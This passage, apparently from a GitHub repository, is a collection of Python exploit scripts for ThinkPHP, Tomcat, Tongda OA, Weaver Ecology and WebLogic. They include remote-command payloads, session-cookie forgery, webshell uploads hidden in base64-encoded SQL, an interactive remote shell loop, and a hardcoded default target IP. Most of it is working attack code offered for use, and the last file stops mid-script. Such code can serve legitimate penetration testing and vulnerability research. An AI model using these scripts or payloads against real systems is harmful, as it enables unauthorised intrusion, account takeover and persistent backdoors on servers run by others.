远程代码执行漏洞-POC集合:https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection') 10 | print("用法:http://example.com/{index.php}不需要index.php") 11 | def check(**kwargs): 12 | url = kwargs['url'] 13 | #req = Requests() 14 | payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num) 15 | try: 16 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 17 | r = requests.post(url + '/index.php?s=captcha', data=payload, headers=headers, verify=False) 18 | if random_num in r.text: 19 | print('[+]thinkphp_5_0_23_rce | ' + url) 20 | return 1 21 | else: 22 | print('[-]target is not vulnerable') 23 | return 24 | except Exception as e: 25 | print("异常对象的内容是%s"%e) 26 | 27 | -------------------------------------------------------------------------------- /POC/Thinkphp_5_rce_1.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | #from lib.Requests import Requests 3 | import requests 4 | 5 | print("用法:http://example.com/{index.php}不需要index.php") 6 | def check(**kwargs): 7 | url = kwargs['url'] 8 | #req = Requests() 9 | payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" 10 | try: 11 | r = requests.get(url + payload, verify=False) 12 | if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text): 13 | print('thinkphp5_rce_1 | ' + url) 14 | return 1 15 | else: 16 | print('target is not vulnerable') 17 | return 18 | except Exception as e: 19 | print("异常对象的内容是%s"%e) 20 | -------------------------------------------------------------------------------- /POC/Tomcat_http_put.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | 4 | 5 | def put(url): 6 | url = url.strip('/') 7 | text = random.randint(100000000, 200000000) 8 | payload = '/{}.txt'.format(text) 9 | url = url + payload 10 | data = {'{}'.format(text): '{}'.format(text)} 11 | header = {"user-agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"} 12 | r = requests.put(url, data=data, allow_redirects=False, verify=False, headers=header) 13 | if r.status_code == 201: 14 | print('[+]HTTP METHOD PUT url: {}'.format(url)) 15 | else: 16 | print('[-]target is not vulnerable') 17 | 18 | print('[*]Usage: [URL]') 19 | def check(url): 20 | put(url) 21 | -------------------------------------------------------------------------------- /POC/Tongda_cookie_11_4.py: -------------------------------------------------------------------------------- 1 | ''' 2 | @Author : Sp4ce 3 | @Date : 2020-03-17 23:42:16 4 | @LastEditors : Sp4ce 5 | @LastEditTime : 2020-04-22 16:24:52 6 | @Description : Challenge Everything. 7 | ''' 8 | import requests 9 | from random import choice 10 | import json 11 | 12 | USER_AGENTS = [ 13 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 14 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", 15 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 16 | "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36" 17 | ] 18 | 19 | headers={} 20 | 21 | def getV11Session(url): 22 | checkUrl = url+'/general/login_code.php' 23 | #print(checkUrl) 24 | try: 25 | headers["User-Agent"] = choice(USER_AGENTS) 26 | getSessUrl = url+'/logincheck_code.php' 27 | res = requests.post( 28 | getSessUrl, data={ 'UID': int(1)},headers=headers, verify=False) 29 | resText = json.loads(res.text) 30 | status = resText['status'] 31 | #print(type(status)) 32 | if str(status) == str(1): 33 | 34 | print('[+]V11 version Get Available Cookie:'+res.headers['Set-Cookie']) 35 | print('[+]访问{}/general'.format(url)) 36 | return 1 37 | else: 38 | if resText['msg']: 39 | print('服务器返回:{}'.format(resText['msg'])) 40 | return 41 | except Exception as e: 42 | print("异常对象的内容是%s"%e) 43 | return 44 | 45 | 46 | def get2017Session(url): 47 | checkUrl = url+'/ispirit/login_code.php' 48 | try: 49 | headers["User-Agent"] = choice(USER_AGENTS) 50 | res = requests.get(checkUrl,headers=headers, verify=False) 51 | resText = json.loads(res.text) 52 | codeUid = resText['codeuid'] #获取返回的codeUid 53 | codeScanUrl = url+'/general/login_code_scan.php' 54 | res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int( 55 | 1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers, verify=False) 56 | resText = json.loads(res.text) 57 | status = resText['status'] 58 | if str(status) == str(1): 59 | getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid #携带codeUid访问 60 | res = requests.get(getCodeUidUrl, verify=False) 61 | print('[+]Get Available Cookie:'+res.headers['Set-Cookie']) #返回的cookie是在set-cookie 62 | return 1 63 | else: 64 | print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable') 65 | return 66 | except Exception as e: 67 | print("异常对象的内容是%s"%e) 68 | 69 | print('[*]Usage: [URL]') 70 | def check(**kwargs): 71 | url = kwargs['url'] 72 | result = getV11Session(url) 73 | if result: 74 | return result 75 | else: 76 | return get2017Session(url) -------------------------------------------------------------------------------- /POC/Tongda_rce_11_4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- encoding: utf-8 -*- 3 | ''' 4 | @File : tongda_rce.py 5 | @Time : 2020/03/18 11:59:48 6 | @Author : fuhei 7 | @Version : 1.0 8 | @Blog : http://www.lovei.org 9 | ''' 10 | 11 | import requests 12 | import re 13 | import sys 14 | 15 | print('[*]Usage: [URL]') 16 | def check(**kwargs): 17 | url = kwargs['url'] 18 | 19 | try: 20 | url1 = url + '/ispirit/im/upload.php' 21 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"} 22 | data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nexec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" 23 | result = requests.post(url1, headers=headers, data=data, verify=False) 24 | 25 | name = "".join(re.findall("2003_(.+?)\|",result.text)) 26 | url2 = url + '/ispirit/interface/gateway.php' 27 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"} 28 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "echo fffhhh"} 29 | result = requests.post(url2, headers=headers, data=data, verify=False) 30 | if result.status_code == 200 and 'fffhhh' in result.text: 31 | # print("[+] Remote code execution vulnerability exists at the target address") 32 | print("[+]Server is vulnerable") 33 | return name 34 | else: 35 | print("[-]Server is not vulnerable") 36 | return 37 | except Exception as e: 38 | print("异常对象的内容是%s"%e) 39 | 40 | def command(url, name,command="whoami"): 41 | url = url + '/ispirit/interface/gateway.php' 42 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"} 43 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command} 44 | result = requests.post(url, headers=headers, data=data, verify=False) 45 | while(1): 46 | command = input("fuhei@shell$ ") 47 | if command == 'exit' or command == 'quit': 48 | break 49 | else: 50 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command} 51 | result = requests.post(url, headers=headers, data=data, verify=False) 52 | print(result.text) 53 | 54 | 55 | if __name__ == '__main__': 56 | url = sys.argv[1] 57 | name = check(url) 58 | if name: 59 | print("[+] Remote code execution vulnerability exists at the target address") 60 | command(url,name) 61 | else: 62 | print("[-] There is no remote code execution vulnerability in the target address") 63 | 64 | 65 | -------------------------------------------------------------------------------- /POC/Tongda_v11_4_rce_getshell.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | 4 | ''' 5 | @ 已测试通过版本: v11.4 6 | @ https://www.github.com/zrools/tools/python 7 | @ 修改 oa_addr 后: python3 tongda_v11.4_rce_exp.py 8 | ''' 9 | 10 | import requests, base64, re 11 | 12 | session = requests.Session() 13 | 14 | oa_addr = 'http://192.168.0.3:8080' 15 | 16 | headers = { 17 | 'Accept-Encoding' : 'gzip, deflate', 18 | 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36' 19 | } 20 | 21 | 22 | def login(): 23 | login_url = '{}/logincheck_code.php'.format(oa_addr) 24 | login_code_url = '{}/general/login_code.php?codeuid=1'.format(oa_addr) 25 | 26 | login_headers = headers 27 | login_headers['X-Requested-With'] = 'XMLHttpRequest' 28 | login_headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8' 29 | 30 | res = session.get(login_code_url) 31 | code_uid = res.text.strip()[-40:-2] 32 | 33 | login_data = 'UID=1&CODEUID={}'.format(code_uid) 34 | 35 | res = session.post(login_url, data=login_data, headers=login_headers) 36 | 37 | if '"status":1' in res.text: 38 | return True 39 | 40 | return False 41 | 42 | 43 | def upload_file(web_path): 44 | upload_url = '{}/general/system/database/sql.php'.format(oa_addr) 45 | 46 | upload_data = base64.b64decode( 'LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMDc0OTk3Njg4MjE0NjY5MjYzOTIwNTI0OTEzNjINCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3FsX2ZpbGUiOyBmaWxlbmFtZT0iZXhwLnNxbCINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC1zcWwNCg0Kc2V0IGdsb2JhbCBnZW5lcmFsX2xvZz0nb24nOwpzZXQgZ2xvYmFsIGdlbmVyYWxfbG9nX2ZpbGU9J01ZT0FfV0VCU0hFTEwnOwpzZWxlY3QgIjw/cGhwICRjb21tYW5kPSRfR0VUWydjbWQnXTskd3NoID0gbmV3IENPTSgnV1NjcmlwdC5zaGVsbCcpOyRleGVjID0gJHdzaC0+ZXhlYygnY21kIC9jICcuJGNvbW1hbmQpOyAkc3Rkb3V0ID0gJGV4ZWMtPlN0ZE91dCgpOyAkc3Ryb3V0cHV0ID0gJHN0ZG91dC0+UmVhZEFsbCgpO2VjaG8gJHN0cm91dHB1dDs/PiI7CnNldCBnbG9iYWwgZ2VuZXJhbF9sb2c9J29mZic7Cg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMDc0OTk3Njg4MjE0NjY5MjYzOTIwNTI0OTEzNjItLQ==') 47 | 48 | #upload_data = base64.b64decode('LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMDc0OTk3Njg4MjE0NjY5MjYzOTIwNTI0OTEzNjIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzcWxfZmlsZSI7IGZpbGVuYW1lPSJleHAuc3FsIgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtc3FsCgpzZXQgZ2xvYmFsIGdlbmVyYWxfbG9nPSdvbic7CnNldCBnbG9iYWwgZ2VuZXJhbF9sb2dfZmlsZT0nTVlPQV9XRUJTSEVMTCc7CnNlbGVjdCAiPD9waHBAZXJyb3JfcmVwb3J0aW5nKDApO3Nlc3Npb25fc3RhcnQoKTtpZiAoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT09ICdQT1NUJyl7ICAgICRrZXk9ImU0NWUzMjlmZWI1ZDkyNWIiOyRfU0VTU0lPTlsnayddPSRrZXk7JHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7aWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSl7JHQ9ImJhc2U2NF8iLiJkZWNvZGUiOyRwb3N0PSR0KCRwb3N0LiIiKTtmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsgICAgICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAgICAgfX1lbHNleyRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpO30gICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7ICAgICRmdW5jPSRhcnJbMF07ICAgICRwYXJhbXM9JGFyclsxXTtjbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2ludm9rZSgkcCkge2V2YWwoJHAuIiIpO319ICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpO30/PiI7CnNldCBnbG9iYWwgZ2VuZXJhbF9sb2c9J29mZic7CgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTIwNzQ5OTc2ODgyMTQ2NjkyNjM5MjA1MjQ5MTM2Mi0t') 49 | 50 | shell_path = '{}\\\\api\\\\test.php'.format(web_path) 51 | upload_data = upload_data.decode('utf8').replace('MYOA_WEBSHELL', shell_path).encode('utf8') 52 | 53 | upload_headers = headers 54 | upload_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------207499768821466926392052491362' 55 | 56 | res = session.post(upload_url, data=upload_data, headers=upload_headers) 57 | 58 | webshell = '' 59 | 60 | if '数据库脚本导入完成' in res.text: 61 | webshell = '{}/api/test.php?cmd=ipconfig'.format(oa_addr) 62 | 63 | return webshell 64 | 65 | 66 | def get_path(): 67 | url = '{}/general/system/security/service.php'.format(oa_addr) 68 | 69 | res = session.get(url, headers=headers) 70 | 71 | web_path = '' 72 | # 避免正则报错 73 | for i in res.text.split("\n"): 74 | if 'WEBROOT' in i: 75 | web_path = i.split('"')[-4] 76 | 77 | return web_path.replace('\\', '\\\\') 78 | 79 | 80 | def check(**kwargs): 81 | 82 | try: 83 | 84 | global oa_addr 85 | oa_addr = kwargs['url'] 86 | if not login(): 87 | print('login failed.') 88 | return None 89 | 90 | web_path = get_path() 91 | print('webroot: ', web_path) 92 | 93 | cookies = ';'.join([k + '=' + v for k, v in session.cookies.items()]) 94 | print('cookies: ', cookies) 95 | 96 | if web_path: 97 | webshell = upload_file(web_path) 98 | if webshell: 99 | print('webshell: (GET) {}'.format(webshell)) 100 | return True 101 | 102 | print('getshell failed.') 103 | return None 104 | except Exception as e: 105 | print('%s 目标不存在漏洞'%oa_addr) 106 | 107 | 108 | if __name__ == '__main__': 109 | check(**{'url':'http://220.166.20.253:8008'}) -------------------------------------------------------------------------------- /POC/URL_getTitle.py: -------------------------------------------------------------------------------- 1 | from requests.packages import urllib3 2 | from util.ExpRequest import ExpRequest,Output 3 | urllib3.disable_warnings() 4 | 5 | def check(**kwargs): 6 | try: 7 | output = Output('url_getTitle') 8 | exprequest = ExpRequest('url_getTitle', output) 9 | exprequest.get(kwargs['url'], retry_time=1) 10 | #print(exprequest.title) 11 | return exprequest.title 12 | except Exception as e: 13 | print('请求 %s 出现异常 %s'%(kwargs['url'], e)) 14 | return type(e) 15 | 16 | if __name__ == "__main__": 17 | pass 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /POC/Weaver-Ecology-OA_RCE-EXP.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | #coding:utf-8 3 | #Author:Ja0k 4 | #For Weaver-Ecology-OA_RCE 5 | 6 | import urllib3 7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 | 9 | import requests,sys 10 | 11 | headers = { 12 | 'Content-Type': 'text/xml; charset=utf-8', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 15 | 'Cache-Control': 'max-age=0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | 'Upgrade-Insecure-Requests': '1', 18 | 'Content-Length': '578' 19 | } 20 | 21 | proxies= {'http':'http://127.0.0.1:8080'} 22 | 23 | print('[*]Usage: [URL]') 24 | def check(**kwargs): 25 | url = kwargs['url'] 26 | 27 | Url_Payload1="/bsh.servlet.BshServlet" 28 | Url_Payload2="/weaver/bsh.servlet.BshServlet" 29 | Url_Payload3="/weaveroa/bsh.servlet.BshServlet" 30 | Url_Payload4="/oa/bsh.servlet.BshServlet" 31 | 32 | Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw""" 33 | Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw""" 34 | Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami""" 35 | for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4): 36 | url= url + Url_Payload 37 | for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3): 38 | try: 39 | http_response = requests.post(url,data=Data_payload,headers=headers,verify=False) 40 | #print http_response.status_code 41 | if http_response.status_code == 200: 42 | if ";" not in (http_response.content): 43 | if "Login.jsp" not in (http_response.content): 44 | if "Error" not in (http_response.content): 45 | print("{0} is a E-cologyOA_RCE Vulnerability").format(url) 46 | print("Server Current Username:{0}").format(http_response.content) 47 | return 1 48 | elif http_response.status_code == 500: 49 | print("{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ").format(url) 50 | return 51 | else: 52 | pass 53 | except Exception as e: 54 | print('出现错误: %s'%type(e)) 55 | #print("异常对象的内容是%s"%e) 56 | 57 | print('target is not vulliabit') 58 | if __name__ == '__main__': 59 | for line in open(sys.argv[1]).readlines(): 60 | url=line.strip() 61 | #check(url) -------------------------------------------------------------------------------- /POC/WeblogicScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | ''' 5 | ____ _ _ _ _ __ __ _ 6 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 7 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 8 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 9 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 10 | 11 | ''' 12 | import sys 13 | import Weblogic.Console 14 | import Weblogic.CVE_2014_4210 15 | import Weblogic.CVE_2016_0638 16 | import Weblogic.CVE_2016_3510 17 | import Weblogic.CVE_2017_3248 18 | import Weblogic.CVE_2017_3506 19 | import Weblogic.CVE_2017_10271 20 | import Weblogic.CVE_2018_2628 21 | import Weblogic.CVE_2018_2893 22 | import Weblogic.CVE_2018_2894 23 | import Weblogic.CVE_2019_2725 24 | import Weblogic.CVE_2019_2729 25 | 26 | version = "1.3" 27 | banner=''' 28 | __ __ _ _ _ ____ 29 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __ 30 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 31 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | | 32 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_| 33 | |___/ 34 | By Tide_RabbitMask | V {} 35 | '''.format(version) 36 | 37 | def PocS(rip,rport): 38 | print('[*]Console path is testing...') 39 | try: 40 | Weblogic.Console.run(rip, rport) 41 | except: 42 | print ("[-]Target Weblogic console address not found.") 43 | 44 | print('[*]CVE_2014_4210 is testing...') 45 | try: 46 | Weblogic.CVE_2014_4210.run(rip, rport) 47 | except: 48 | print ("[-]CVE_2014_4210 not detected.") 49 | 50 | print('[*]CVE_2016_0638 is testing...') 51 | try: 52 | Weblogic.CVE_2016_0638.run(rip, rport, 0) 53 | except: 54 | print ("[-]CVE_2016_0638 not detected.") 55 | 56 | print('[*]CVE_2016_3510 is testing...') 57 | try: 58 | Weblogic.CVE_2016_3510.run(rip, rport, 0) 59 | except: 60 | print ("[-]CVE_2016_3510 not detected.") 61 | 62 | print('[*]CVE_2017_3248 is testing...') 63 | try: 64 | Weblogic.CVE_2017_3248.run(rip, rport, 0) 65 | except: 66 | print ("[-]CVE_2017_3248 not detected.") 67 | 68 | print('[*]CVE_2017_3506 is testing...') 69 | try: 70 | Weblogic.CVE_2017_3506.run(rip, rport, 0) 71 | except: 72 | print ("[-]CVE_2017_3506 not detected.") 73 | 74 | print('[*]CVE_2017_10271 is testing...') 75 | try: 76 | Weblogic.CVE_2017_10271.run(rip, rport, 0) 77 | except: 78 | print("[-]CVE_2017_10271 not detected.") 79 | 80 | #print('[*]CVE_2018_2628 is testing...') 81 | 82 | print('[*]CVE_2018_2628 need you check in yourself') 83 | 84 | 85 | #print('[*]CVE_2018_2893 is testing...') 86 | 87 | print('[*]CVE_2018_2893 need you check in yourself') 88 | 89 | print('[*]CVE_2018_2894 is testing...') 90 | try: 91 | Weblogic.CVE_2018_2894.run(rip, rport, 0) 92 | except: 93 | print("[-]CVE_2018_2894 not detected.") 94 | 95 | print('[*]CVE_2019_2725 is testing...') 96 | try: 97 | Weblogic.CVE_2019_2725.run(rip, rport, 0) 98 | except: 99 | print("[-]CVE_2019_2725 not detected.") 100 | 101 | print('[*]CVE_2019_2729 is testing...') 102 | try: 103 | Weblogic.CVE_2019_2729.run(rip, rport, 0) 104 | except: 105 | print("[-]CVE_2019_2729 not detected.") 106 | 107 | print ("[*]Happy End,the goal is {}:{}".format(rip,rport)) 108 | 109 | print('[*]Usage: [IP] [PORT=7001]') 110 | def check(**kwargs): 111 | url = kwargs['url'] 112 | port = int('8002') 113 | PocS(url,port) 114 | 115 | if __name__ == '__main__': 116 | print(banner) 117 | print('Welcome To WeblogicScan !!!\nWhoami:rabbitmask.github.io') 118 | if len(sys.argv)<3: 119 | print('Usage: python3 WeblogicScan [IP] [PORT]') 120 | else: 121 | url = sys.argv[1] 122 | port = int(sys.argv[2]) 123 | check(url,port) 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | -------------------------------------------------------------------------------- /POC/Weblogic_GIOP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket,ssl 3 | import struct 4 | from urllib.parse import urlparse 5 | 6 | # Send headers 7 | IIOP_headers = bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365') 8 | 9 | def handleURL(url): 10 | getipport = urlparse(url) 11 | hostname = getipport.hostname 12 | port = getipport.port 13 | if port == None and r"https://" in url: 14 | port = 443 15 | elif port == None and r"http://" in url: 16 | port = 80 17 | if r"https://" in url: 18 | url = "https://"+hostname+":"+str(port) 19 | if r"http://" in url: 20 | url = "http://"+hostname+":"+str(port) 21 | if r"https" in url: 22 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) 23 | else: 24 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | return hostname,port,sock 26 | 27 | def check(**kwargs): 28 | if 'http' in kwargs['url']: 29 | hostname,port,sock = handleURL(kwargs['url']) 30 | server_address = (hostname, port) 31 | elif ':' in kwargs['url']: 32 | server_address = (kwargs['url'].split(":")[0],int(kwargs['url'].split(":")[1])) 33 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | else: 35 | print('输入错误, 请输入 URL链接 或者 IP:PORT !') 36 | return 37 | print('[+] Connecting to %s port %s' % server_address) 38 | sock.settimeout(5) 39 | try: 40 | sock.connect(server_address) 41 | print('sending:\n%s' % IIOP_headers.decode("utf-8", "ignore")) 42 | sock.sendall(IIOP_headers) 43 | data = sock.recv(20) 44 | print('received:\n%s' % data.decode("utf-8", "ignore")) 45 | sock.sendall(IIOP_headers) 46 | if b'GIOP' in data: 47 | print('%s 目标启用GIOP协议!'%server_address[0]) 48 | return 1 49 | else: 50 | print('%s 目标已禁用GIOP协议!'%server_address[0]) 51 | return 0 52 | except Exception as e: 53 | print(e) 54 | finally: 55 | sock.close() 56 | return 0 57 | 58 | 59 | #payloadObj = open(sys.argv[3],'rb').read() 60 | 61 | #payload = '\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00' 62 | #payload=payload.encode()+payloadObj 63 | 64 | # adjust header for appropriate message length 65 | #payload=struct.pack('>I',len(payload)) + payload[4:] 66 | 67 | #print('[+] Sending payload...') 68 | #sock.send(payload) 69 | #data = sock.recv(1024) 70 | #print('received "%s"' % data) 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /POC/Weblogic_T3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket,ssl 3 | import struct 4 | import binascii 5 | from urllib.parse import urlparse 6 | 7 | # Send headers 8 | T3_headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\nLP:DOMAIN\n\n' 9 | #十六进制发送 10 | T3_hex = binascii.unhexlify("74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a50553a74333a2f2f75732d6c2d627265656e733a373030310a0a00000583016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e6") 11 | 12 | def handleURL(url): 13 | getipport = urlparse(url) 14 | hostname = getipport.hostname 15 | port = getipport.port 16 | if port == None and r"https://" in url: 17 | port = 443 18 | elif port == None and r"http://" in url: 19 | port = 80 20 | if r"https://" in url: 21 | url = "https://"+hostname+":"+str(port) 22 | if r"http://" in url: 23 | url = "http://"+hostname+":"+str(port) 24 | if r"https" in url: 25 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) 26 | else: 27 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | return hostname,port,sock 29 | 30 | def check(**kwargs): 31 | if 'http' in kwargs['url']: 32 | hostname,port,sock = handleURL(kwargs['url']) 33 | server_address = (hostname, port) 34 | elif ':' in kwargs['url']: 35 | server_address = (kwargs['url'].split(":")[0],int(kwargs['url'].split(":")[1])) 36 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 37 | else: 38 | print('输入错误, 请输入 URL链接 或者 IP:PORT !') 39 | return 40 | print('[+] Connecting to %s port %s' % server_address) 41 | sock.settimeout(5) 42 | try: 43 | sock.connect(server_address) 44 | print('sending:\n%s' % T3_headers) 45 | sock.sendall(T3_headers.encode()) 46 | #print('sending:\n%s' % T3_hex.decode("utf-8", "ignore")) 47 | #sock.sendall(T3_hex) 48 | data = sock.recv(1024) 49 | print('received:\n%s' % data.decode()) 50 | except Exception as e: 51 | print(e) 52 | finally: 53 | sock.close() 54 | 55 | #payloadObj = open(sys.argv[3],'rb').read() 56 | 57 | #payload = 